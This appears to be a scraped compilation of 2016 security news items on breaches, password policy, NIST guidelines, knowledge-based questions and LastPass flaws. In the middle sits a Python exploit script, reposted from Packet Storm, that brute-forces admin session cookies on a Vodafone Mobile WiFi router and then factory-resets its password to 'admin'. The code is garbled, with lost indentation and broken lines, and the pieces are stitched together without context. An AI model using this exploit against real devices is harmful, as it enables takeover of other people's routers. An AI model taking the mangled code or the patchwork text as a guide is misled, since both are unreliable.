Here’s an overview of some of last week’s most interesting news and articles:

Yahoo breach was not state-sponsored, researchers claim
The massive 2014 Yahoo breach isn’t the work of state-sponsored hackers as the company has claimed to believe, say researchers from identity protection and threat intelligence firm InfoArmor. Instead, the breach was effected by a group of professional blackhats believed to be from Eastern Europe.

The psychological reasons behind risky password practices
A Lab42 survey highlights the psychology around why consumers develop poor password habits despite understanding the obvious risk, and suggests that there is a level of cognitive dissonance around our online habits.

Mobile security stripped bare: Why we need to start again
There are three main threat vectors for mobile devices: targeting and intercepting the communications to and from devices; targeting the devices’ external interfaces (Cellular, WiFI, Bluetooth, USB, NFC, Web etc.) for the purpose of device penetration and planting malicious code; and targeting the data on the device and the resources/functions the device/underlying OS provides access to such as microphone, camera, GPS, etc.

ICS-CERT releases new tools for securing industrial control systems
The Industrial Control Systems Cyber Emergency Response Team (ICS-CERT) has published newer versions of two tools that can help administrators with securing industrial control systems: the Cyber Security Evaluation Tool (CSET), and a whitepaper on recommended practices for improving ICS cybersecurity with defense-in-depth strategies.

OS analysis tool osquery finally available for Windows
Nearly two years after Facebook open sourced osquery, the social networking giant has made available an osquery developer kit for Windows, allowing security teams to build customized solutions for Windows networks.

DefecTor: DNS-enhanced correlation attacks against Tor users
A group of researchers from Princeton University, Karlstad University and KTH Royal Institute of Technology have devised two new correlation attacks that can be leveraged to deanonymize Tor users.

Incident response survival guide
Here are some steps that will allow organizations to minimize the damage when a security breach occurs.

D-Link DWR-932 router is chock-full of security holes
Security researcher Pierre Kim has unearthed a bucketload of vulnerabilities affecting the LTE router/portable wireless hotspot D-Link DWR-932. Among these are backdoor accounts, weak default PINs, and hardcoded passwords.

Enhance iMessage security using Confide
One of the new features in iOS 10 offers the possibility of deploying specially crafted applications within iMessage. Most users will probably (ab)use this new functionality for sending tiresome animations and gestures, but some applications can actually provide added value for iMessage communication.

Why digital hoarding poses serious financial and security risks
82 percent of IT decision makers admit they are hoarders of data and digital files. These include: unencrypted personal records, job applications to other companies, unencrypted company secrets and embarrassing employee correspondence.

Clear and present danger: Combating the email threat landscape
As long as organisations use email to send and receive files, malicious email attachments will continue to plague corporate inboxes.

Europol identifies eight main cybercrime trends
A significant proportion of cybercrime activity still involves the continuous recycling of relatively old techniques, security solutions for which are available but not widely adopted.

Microsoft equips Edge with hardware-based container
Windows Defender Application Guard is a lightweight virtual machine that prevents malicious activity coming from the web from reaching the operating system, apps, data, and the enterprise network.

Rise of the drones: Managing a new risk environment
More drones in the skies raise a number of new safety concerns, ranging from collisions and crashes to cyber-attacks and terrorism.

Swiss voters approve new surveillance law
The Swiss Federal Intelligence Service will now be able to bug private property, phone lines, and wiretap computers (under certain conditions).

IoT-based DDoS attacks on the rise
As attackers are now highly aware of insufficient IoT security, many pre-program their malware with commonly used and default passwords, allowing them to easily hijack IoT devices. Poor security on many IoT devices makes them easy targets, and often victims may not even know they have been infected.

Public safety threat: Cyber attacks targeting smart city services
A new survey conducted by Dimensional Research assessed cyber security challenges associated with smart city technologies.

Help Net Security

Microsoft recently announced that it would begin banning weak passwords for a variety of its services and also...

introduced a feature called Smart Password Lockout to prevent attackers from guessing passwords. How is Microsoft banning these weak passwords, and how does the Smart Password Lockout work? Will these things benefit enterprises or just complicate matters?

Stealing passwords is big business in the world of cybercrime. One Russian hacker known as the Collector has recently been offering more than 250 million stolen usernames and passwords for, Yahoo Mail, Gmail, Hotmail and other accounts. Another hacker nicknamed Peace is advertising for sale a database of 167 million emails and hashed passwords belonging to LinkedIn users. As many people use the same username and password for multiple sites, their credentials can potentially provide easy access to social media accounts, online banking services and enterprise networks and resources. According to Microsoft's  Security Intelligence Report Volume 20, it detects more than 10 million credential attacks every day across its various identity systems.

When these big password lists come on to the market they are analyzed both by cybercriminals and security teams, such as Microsoft's Azure Active Directory Identity Protection team -- everyone is looking to see which passwords are the most common. Microsoft is using this information to dynamically update its banned list of common and similar weak passwords. Now, before a user's proposed password is accepted for her Microsoft Account or in Azure AD, it's compared against this list to ensure it's not present. If it is on the list, the user is prompted to choose a password that's harder for other people to guess. By preventing users from choosing common and easy to guess weak passwords, it will reduce the chances of their passwords being cracked by a rainbow table or dictionary-based, brute force attack.

On top of this feature, Microsoft is also introducing Smart Password Lockout to reduce the disruption caused by hackers trying to guess an account password online and triggering an account lockdown. When Microsoft's security system detects someone trying to guess a password online, it will only lock out that specific login session. This means when the genuine user tries to log in, the account is not locked, and as long as she enters the correct username and password, she can access her account. This will save huge amounts of time and frustration given the millions of attacks that occur each day. The only time a genuine user will be locked out is if someone is judged to be trying to guess her password while using the user's own machine or network.

Although many policies and online services try to enforce strong passwords by requiring users to choose a password with a minimum length and complexity, Microsoft has found that this forces people to standardize their passwords in order to remember them, making it easier for hackers to crack them. Preventing users from choosing common weak passwords will certainly improve the effectiveness of many password policies by ensuring passwords are more unique, and therefore harder to guess. Although these security features will certainly help improve password security, some users may struggle to remember harder passwords.

As bad passwords are a major weakness in endpoint security, enterprises should be moving to multifactor authentication (MFA), particularly when users need to access sensitive resources or information. MFA makes it a lot harder for a hacker to use stolen credentials to gain access to endpoint devices and the rest of the network. The presence of high quality cameras, microphones and fingerprint readers in many of today's devices means it's never been easier to implement. The FIDO specification supports a wide range of authentication technologies, including biometrics, USB security tokens and smart cards that can be deployed without extensive programming. Hopefully these technologies will help end the role of the password as the primary authentication factor.

Ask the Expert: Want to ask Michael Cobb a question about application security? Submit your questions now via email. (All questions are anonymous.)

Next Steps

Pick from the top multifactor authentication products

Find out how to protect your organization from bad passwords

Learn how to avoid data breaches with better passwords

This was first published in September 2016

SearchSecurity: Security Wire Daily News

A quick fix for stupid password reset questions

It didn’t take 500 million hacked Yahoo accounts to make me hate, hate, hate password reset questions (otherwise known as knowledge-based authentication or KBA). It didn't help when I heard that password reset questions and answers -- which are often identical, required, and reused on other websites -- were compromised in that massive hack, too. 

Is there any security person or respected security guidance that likes them? They are so last century. What is your mother’s maiden name? What is your favorite color? What was your first pet’s name?

[ Simplify your security with 8 password managers for Windows, MacOS, iOS, and Android. Find out which one prevails in InfoWorld's review. | Discover how to secure your systems with InfoWorld's Security newsletter. ]

The “hardest” (if I can use that term) questions may have up to 100 or 200 possible answers, and only if you aren’t forced to choose predefined answers. Thanks to the advent of social media and online (often illegal) record-check websites, these questions aren’t difficult to guess.

The weakest links

For decades we've known that password reset questions were the weakest link within any authentication system. Hackers love them. While they may supposedly protect passwords with a decent level of complexity and entropy, a KBA question answer almost always lacks both.

You probably remember the Sarah Palin email hack. The convicted hacker described hacking the KBA questions as so easy that he couldn’t call it hacking -- apparently, he used a Wikipedia article to find Palin's birth date, a common security question at the time. Mitt Romney’s account got compromised due to knowledge of his favorite animal.

Even very good security researchers and reporters get KBA-hacked. No matter how good you are at security, you’re left with no security if a website requires you to use weak KBA questions and answers.

What to do when you're forced to use KBA

Millions of websites and services often require that we use KBA systems. If you want an account, you must supply at least one (often three) KBA answers (sometimes questions, too).

Here’s what you do: Treat the KBA answers like a password. If you’re asked for three KBA questions and answers, make all the answers separate, nonsensical, and passwordlike.

Never put in the real answer. Don’t even put in possible fake answers that look realistic. A hacker will have an easier time guessing that your favorite answer is aardvark, then SimpleMan7!.

What I’m saying is to invent separate “passwords” for each KBA question, and make sure you don’t repeat them between websites or services (although I am OK with using the same KBA password answer for all questions on the same site if allowed). In my experience, most websites requiring KBA answers don’t track to see if your answers are unique between questions, but about 25 percent do.

You don’t want to use the same KBA answers between different sites -- if one website gets owned (like Yahoo did back in 2014 … and you’re finding out about it now), the attacker might trying using your KBA on other websites they haven’t hacked. That's what I'd do if I were a malicious hacker.

Yes, this means you have to write down your KBA questions and answers for each website, in the same way you might already store your current passwords. Hopefully you never store your password in complete, plaintext form, although I guess you'd have to do so with password storage methods that autofill your answer. I don’t trust password storage systems any more than I do KBAs.

Most sources that recommend stronger KBA answers also suggest using answers that hackers would never guess. That’s not enough. You need to make sure the answers aren’t anywhere near any possible real response (for example, a complex string of characters) and remember not to reuse them between websites.

I know it’s a pain, so remind those websites what century we're in and make them start using two-factor authentication instead. That way your embarrassing pictures or personal emails won't end up on the web because your provider was horrible at security.

Previous Post

Seagate NAS hack should scare us all

Pokémon GO Spam, Ransomware, On the Rise

August 17, 2016 , 12:58 pm

500 Million Yahoo Accounts Stolen By State-Sponsored Hackers

September 22, 2016 , 3:47 pm

Yahoo Reportedly to Confirm Breach of Hundreds of Millions of Credentials

September 22, 2016 , 12:31 pm

Experts Want Transparency From Government’s Vulnerabilities Equities Process

September 20, 2016 , 2:41 pm

Bruce Schneier on Probing Attacks Testing Core Internet Infrastructure

September 15, 2016 , 11:15 am

Generic OS X Malware Detection Method Explained

September 13, 2016 , 9:14 am

Patched Android Libutils Vulnerability Harkens Back to Stagefright

September 9, 2016 , 2:06 pm

Chrome to Label Some HTTP Sites ‘Not Secure’ in 2017

September 8, 2016 , 3:43 pm

Threatpost News Wrap, September 2, 2016

September 2, 2016 , 9:00 am

Insecure Redis Instances at Core of Attacks Against Linux Servers

September 1, 2016 , 1:08 pm

Dropbox Forces Password Reset for Older Users

August 29, 2016 , 9:58 am

Cisco Begins Patching Equation Group ASA Zero Day

August 24, 2016 , 5:53 pm

New Collision Attacks Against 3DES, Blowfish Allow for Cookie Decryption

August 24, 2016 , 8:00 am

Cisco Acknowledges ASA Zero Day Exposed by ShadowBrokers

August 17, 2016 , 4:06 pm

ProjectSauron APT On Par With Equation, Flame, Duqu

August 8, 2016 , 1:40 pm

Miller, Valasek Deliver Final Car Hacking Talk

August 4, 2016 , 3:26 pm

Researchers Go Inside a Business Email Compromise Scam

August 4, 2016 , 10:00 am

Export-Grade Crypto Patching Improves

August 3, 2016 , 10:00 am

Kaspersky Lab Launches Bug Bounty Program

August 2, 2016 , 9:00 am

Threatpost News Wrap, July 29, 2016

July 29, 2016 , 10:45 am

KeySniffer Vulnerability Opens Wireless Keyboards to Snooping

July 26, 2016 , 9:30 am

Upcoming Tor Design Battles Hidden Services Snooping

July 25, 2016 , 3:51 pm

EFF Files Lawsuit Challenging DMCA’s Restrictions on Security Researchers

July 21, 2016 , 1:18 pm

Oracle Patches Record 276 Vulnerabilities with July Critical Patch Update

July 20, 2016 , 9:21 am

Threatpost News Wrap, July 15, 2016

July 15, 2016 , 11:00 am

Academics Build Early-Warning Ransomware Detection System

July 14, 2016 , 1:05 pm

xDedic Hacked Server Market Resurfaces on Tor Domain

July 12, 2016 , 11:40 am

Conficker Used in New Wave of Hospital IoT Device Attacks

June 30, 2016 , 11:48 am

655,000 Healthcare Records Being Sold on Dark Web

June 28, 2016 , 10:00 am

Windows Zero Day Selling for $ 90,000

May 31, 2016 , 5:44 pm

Millions of Stolen MySpace, Tumblr Credentials Being Sold Online

May 31, 2016 , 1:37 pm

OTR Protocol Patched Against Remote Code Execution Flaw

March 10, 2016 , 10:23 am

New Gmail Alerts Warn of Unauthenticated Senders

August 11, 2016 , 2:10 pm

New Trojan SpyNote Installs Backdoor on Android Devices

July 29, 2016 , 12:21 pm

Keystroke Recognition Uses Wi-Fi Signals To Snoop

August 25, 2016 , 2:19 pm

Critical MySQL Vulnerability Disclosed

September 12, 2016 , 11:00 am

PLC-Blaster Worm Targets Industrial Control Systems

August 5, 2016 , 4:49 pm

Android Patch Fixes Nexus 5X Critical Vulnerability

September 2, 2016 , 12:49 pm

Browser Address Bar Spoofing Vulnerability Disclosed

August 17, 2016 , 12:54 pm

Threatpost | The first stop for security news

import urllib2
import json
from datetime import datetime, timedelta
import time
import httplib
from threading import Thread
from Queue import Queue
from multiprocessing import process

print """
Vodafone Mobile WiFi - Password reset exploit (Daniele Linguaglossa)
thread_lock = False
session = ""
def unix_time_millis(dt):
epoch = datetime.utcfromtimestamp(0)
return int(((dt - epoch).total_seconds() * 1000.0) / 1000)


def check_process_output():
print 1

p = process.Process(target=check_process_output)

print a

def crack(queue):
global thread_lock
global session
while True:
if thread_lock:
if not queue.empty():
cookie = queue.get()
headers = 'Referer': '', 'Cookie': "stok=%s" % cookie
req = urllib2.Request(""
% time.time(), None, headers)
result = urllib2.urlopen(req).read()
if json.loads(result)["AuthMode"] != "":
print "[+] Found valid admin session!"
print "[INFO] Terminating other threads ... please wait"
session = cookie
thread_lock = True

def start_threads_with_args(target, n, arg):
thread_pool = []
for n_threads in range(0, n):
thread = Thread(target=target, args=(arg,))
return thread_pool

def start_bruteforce():
global session
global thread_lock
queue = Queue(0)
start_threads_with_args(crack, 15, queue)
print"[!] Trying fast bruteforce..."
for x in range(0, 1000):
if thread_lock:
queue.put("123abc456def789%03d" % x)
while True:
if session != "":
return session
if queue.empty():
print "[!] Trying slow bruteforce..."
for milliseconds in range(0, how_many):
if thread_lock:
queue.put("123abc456def789%s" % (start + milliseconds))
while True:
if session != "":
return session
if queue.empty():
return session
if __name__ == "__main__":
now =
hours = raw_input("How many hours ago admin logged in: ")
minutes = raw_input("How many minutes ago admin logged in: ")
init = datetime(now.year, now.month,, now.hour, now.minute) - timedelta(hours=int(hours), minutes=int(minutes))
end = datetime(now.year, now.month,, 23, 59, 59, 999999)
start = unix_time_millis(init)
how_many = unix_time_millis(end) - start + 1
print "[+] Starting session bruteforce with 15 threads"
valid_session = ""
valid_session = start_bruteforce()
except KeyboardInterrupt:
print "[-] Exiting.."
thread_lock = True
if valid_session == "":
print "[!] Can't find valid session 🙁 quitting..."
print "[+] Resetting router password to 'admin' , network may be down for a while"
headers = 'Referer': '', 'Cookie': "stok=%s" % valid_session
req = urllib2.Request("",
"goformId=RESTORE_FACTORY_SETTINGS&_=%s" % time.time(), headers)
except httplib.BadStatusLine:
print "[!] Password resetted to admin! have fun!"
except Exception:
print "[x] Error during password reset"
print "[-] Can't reset password try manually, your session is: %s" % valid_session

Exploit Files ≈ Packet Storm

It’s no secret. We’re really bad at passwords. Nevertheless, they aren’t going away any time soon.

With so many websites and online applications requiring us to create accounts and think up passwords in a hurry, it’s no wonder so many of us struggle to follow the advice of so-called password security experts.

At the same time, the computing power available for password cracking just gets bigger and bigger.

OK, so I started with the bad news, but this cloud does have a silver lining.

It doesn’t need to be as hard as we make it and the government is here to help.

That’s right, the United States National Institute for Standards and Technology (NIST) is formulating new guidelines for password policies to be used in the whole of the US government (the public sector).

Why is this important? Because the policies are sensible and a great template for all of us to use within our own organizations and application development programs.

Anyone interested in the draft specification for Special Publication 800-63-3: Digital Authentication Guidelines can review it as it evolves over on Github.

For a more human approach, security researcher Jim Fenton did a presentation earlier this month at the PasswordsCon event in Las Vegas that sums up the changes nicely.

What’s new ?

What are the major differences between current received wisdom about “secure passwords” and what NIST is now recommending?

Some of the recommendations you can probably guess; others may surprise you.

We’ll start with the things you should do.

Favor the user. To begin with, make your password policies user friendly and put the burden on the verifier when possible.

In other words, we need to stop asking users to do things that aren’t actually improving security.

Much research has gone into the efficacy of many of our so-called “best practices” and it turns out they don’t help enough to be worth the pain they cause.

Size matters. At least it does when it comes to passwords. NIST’s new guidelines say you need a minimum of 8 characters. (That’s not a maximum minimum – you can increase the minimum password length for more sensitive accounts.)

Better yet, NIST says you should allow a maximum length of at least 64, so no more “Sorry, your password can’t be longer than 16 characters.”

Applications must allow all printable ASCII characters, including spaces, and should accept all UNICODE characters, too, including emoji!

This is great advice, and considering that passwords must be hashed and salted when stored (which converts them to a fixed-length representation) there shouldn’t be unnecessary restrictions on length.

We often advise people to use passphrases, so they should be allowed to use all common punctuation characters and any language to improve usability and increase variety.

Check new passwords against a dictionary of known-bad choices. You don’t want to let people use ChangeMe, thisisapassword, yankees, and so on.

More research needs to be done into how to choose and use your “banned list,” but Jim Fenton thinks that 10,000 entries is a good starting point.

The don’ts

Now for all the things you shouldn’t do.

No composition rules. What this means is, no more rules that force you to use particular characters or combinations, like those daunting conditions on some password reset pages that say, “Your password must contain one lowercase letter, one uppercase letter, one number, four symbols but not &%#@_, and the surname of at least one astronaut.”

Let people choose freely, and encourage longer phrases instead of hard-to-remember passwords or illusory complexity such as pA55w+rd.

No password hints. None. If I wanted people have a better chance at guessing my password, I’d write it on a note attached to my screen.

People set passwords hints like rhymes with assword when you allow hints. (Really! We have some astonishing examples from Adobe’s 2013 password breach.)

Knowledge-based authentication (KBA) is out. KBA is when a site says, “Pick from a list of questions – Where did you attend high school? What’s your favourite football team? – and tell us the answer in case we ever need to check that it’s you.”

No more expiration without reason. This is my favourite piece of advice: If we want users to comply and choose long, hard-to-guess passwords, we shouldn’t make them change those passwords unnecessarily.

The only time passwords should be reset is when they are forgotten, if they have been phished, or if you think (or know) that your password database has been stolen and could therefore be subjected to an offline brute-force attack.

There’s more…

NIST also provides some other very worthwhile advice.

All passwords must be hashed, salted and stretched, as we explain in our article How to store your users’ password safely.

You need a salt of 32 bits or more, a keyed HMAC hash using SHA-1, SHA-2 or SHA-3, and the “stretching” algorithm PBKDF2 with at least 10,000 iterations.

Password hashing enthusiasts are probably wondering, “What about bcrypt and scrypt?” In our own How to article, we listed both of these as possibilities, but wrote, “We’ll recommend PBKDF2 here because it is based on hashing primitives that satisfy many national and international standards.” NIST followed the same reasoning.

Additionally, and this is a big change: SMS should no longer be used in two-factor authentication (2FA).

There are many problems with the security of SMS delivery, including malware that can redirect text messages; attacks against the mobile phone network (such as the so-called SS7 hack); and mobile phone number portability.

Phone ports, also known as SIM swaps, are where your mobile provider issues you a new SIM card to replace one that’s been lost, damaged, stolen or that is the wrong size for your new phone.

In many countries it is unfortunately far too easy for criminals to convince a mobile phone store to transfer someone’s phone number to a new SIM and therefore hijacking all their text messages.

What next?

This is just the tip of the iceberg, but certainly some of the most important bits.

Password policies need to evolve as we learn more about how people use and abuse them.

Sadly there have been more than enough breaches for us to see the impacts of certain types of policy, such as the evidence shown above from Adobe’s 2013 hack about the danger of password hints.

NIST’s goal is to get us to protect ourselves reliably without unneeded complexity, because complexity works against security.

What are your thoughts on these changes? Will you implement them for your organization? Tell us in the comments.


(Audio player above not working? Download MP3, listen on Soundcloud or access via iTunes.)

Information Security Podcasts

Even password manager LastPass can be fooled. A Google security researcher has found a way to remotely hijack the software.

It works by first luring the user to a malicious site. The site will then exploit a flaw in a LastPass add-on for the Firefox browser, giving it control over the password management software.

[ Also on InfoWorld: 19 open source GitHub projects for security pros. | Discover how to secure your systems with InfoWorld's Security newsletter. ]

LastPass wrote about the vulnerability on Wednesday and said that a fix is already out for Firefox users.

Google security research Tavis Ormandy first discovered the issue. When examining the password manager, he tweeted on Tuesday, "Are people really using this lastpass thing? I took a quick look and can see a bunch of obvious critical problems. I'll send a report asap."

Any vulnerability with LastPass could pose a big risk for users. The popular software is supposed to securely store and autofill all the passwords users have for their different sites.

Ormandy isn't the only security researcher to find flaws with the password manager. On Wednesday, Mathias Karlsson at Detectify Labs said that he had also managed to hack LastPass -- in this case, to steal user passwords.

He did so by exploiting a bug in the password manager's Chrome browser extension, Karlsson
InfoWorld Security

Oct 30 2015   7:24PM GMT

Ken Harthun Ken Harthun Profile: Ken Harthun


Thanks! We'll email you
when relevant content is
added and updated.



Password policies

Thanks! We'll email you
when relevant content is
added and updated.




Security Corner

Nov 11 2015   2:47PM GMT

Ken Harthun Ken Harthun Profile: Ken Harthun


Thanks! We'll email you
when relevant content is
added and updated.




Thanks! We'll email you
when relevant content is
added and updated.




Thanks! We'll email you
when relevant content is
added and updated.




Thanks! We'll email you
when relevant content is
added and updated.



Security Corner